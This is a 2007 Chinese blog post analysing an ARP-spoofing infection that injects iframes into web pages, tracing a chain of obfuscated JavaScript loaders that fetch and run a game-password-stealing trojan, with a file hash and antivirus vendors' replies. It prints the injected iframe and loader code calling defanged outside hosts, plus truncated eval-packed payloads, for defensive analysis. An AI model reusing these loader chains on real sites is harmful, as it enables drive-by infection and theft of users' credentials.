ARP病毒自动加入传播Trojan.PSW.Win32.OnlineGames的代码
endurer 原创
2007-07-31 第1版
前两天,一位网友反映他最近打开网页显示都是乱码。
让他把网页源代码传过来分析,发现网页首部被加入代码:
/---
<iframe src=hxxp://**.9**-*6*.in/n.js width=1 height=1></iframe>
---/
hxxp://**.9**-*6*.in/n.js 包含代码:
/---
document.writeln("<script>window.onerror=function(){return true;}<\/script>");
document.writeln("<script src=\"hxxp:\/\/**.9**-*6*.in\/S368\/NewJs2.js\"><\/script>");
document.writeln("<script>");
document.writeln("function StartRun(){");
document.writeln("var Then = new Date() ");
document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)");
document.writeln("var cookieString = new String(document.cookie)");
document.writeln("var cookieHeader = \"Cookie1=\" ");
document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)");
document.writeln("if (beginPosition!= -1){ ");
document.writeln("} else ");
document.writeln("{ document.cookie = \"Cookie1=POPWINDOS;expires=\"+ Then.toGMTString() ");
document.writeln("document.write(\'<iframe width=0 height=0 src=\"hxxp:\/\/**.9**-*6*.in\/s368\/T368.htm\"><\/iframe>\');");
document.writeln("}");
document.writeln("}");
document.writeln("StartRun();");
document.writeln("<\/script>")
---/
hxxp://**.9**-*6*.in/S368/NewJs2.js 内容为:
/---
StrInfo = "\x3c\x73\x63…(略)…\x74\x3e"
window["\x64\…(略)…\x74"]["\x77…(略)…\x65"](StrInfo);
---/
经过2次解密得到原始代码,功能是下载S368.exe,保存到 %windir%,文件由自定义函数
/---
function GnMs(n)
{
var numberMs = Math.random()*n;
return '~Temp'+Math.round(numberMs)+'.tmp';
}
---/
生成,即~Temp****.tmp,然后调用 cmd.exe /c 来运行。
hxxp://**.9**-*6*.in/s368/T368.htm 内容为:
/---
<script>
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};…(略)…123|eval'.split('|'),0,{}))
---/
经过2次解密得到原始代码:
/---
info = "<script src=\"S368.jpg\"></script>"
document.write(info)
<script src="S368.jpg"></script>
---/
hxxp://**.9**-*6*.in/s368/S368.jpg 的内容为:
/---
eval(function(p,a,c,k,e,r){e=function(c){return(…(略)…|x55'.split('|'),0,{}))
---/
经过2次解密得到原始代码,功能是利用 WebThunder,通过IE打开网页 hxxp://c***k*1**.in/S368/downmm.html,通过 wscript.shell有exec 执行 IE缓存中的 S3682[1].exe。
hxxp://c***k*1**.in/S368/downmm.html 的内容为:
/---
<script>
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};…(略)…|eval'.split('|'),0,{}))
</script>
---/
经过2次解密得到原始代码:
/---
eval("document.writeln("<script src=\"S3682.exe\"><\/script>")")<script src="S3682.exe"></script>
<script src="S3682.exe"></script>
---/
文件说明符 : D:/test/S368.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-7-30 12:24:59
修改时间 : 2007-7-30 12:25:2
访问时间 : 2007-7-30 0:0:0
大小 : 23599 字节 23.47 KB
MD5 : cbcc07d2350560c4be2cf073382aa3f2
EXEStealth 2.0 - 2.4 -> WebtoolMaster
主 题: | RE: S368.exe [KLAB-2526687] | ||
发件人: | "" <newvirus@kaspersky.com> | 发送时间:2007-07-30 13:50:17 |
Hello.
Virus.Win32.AutoRun.bk
New malicious software was found in the attached file.
It's detection will be included in the next update. Thank you for your help.
-----------------
Regards, Yury Nesmachny
Virus Analyst, Kaspersky Lab.
主 题: | 病毒上报邮件分析结果-流水单号:20070730123450377314 | ||
发件人: | "" <send@rising.net.cn> <script language="JavaScript" type="text/javascript"> </script> | 发送时间:2007-07-31 21:56:41 |
您的邮件已经收到,感谢您对瑞星的支持。
我们已经详细分析过您的问题和文件,以下是您上传的文件的分析结果:
1.文件名:S368.exe
病毒名: Trojan.PSW.Win32.OnlineGames.dsp
您所上报的病毒文件将在19.34.02版本中处理解决。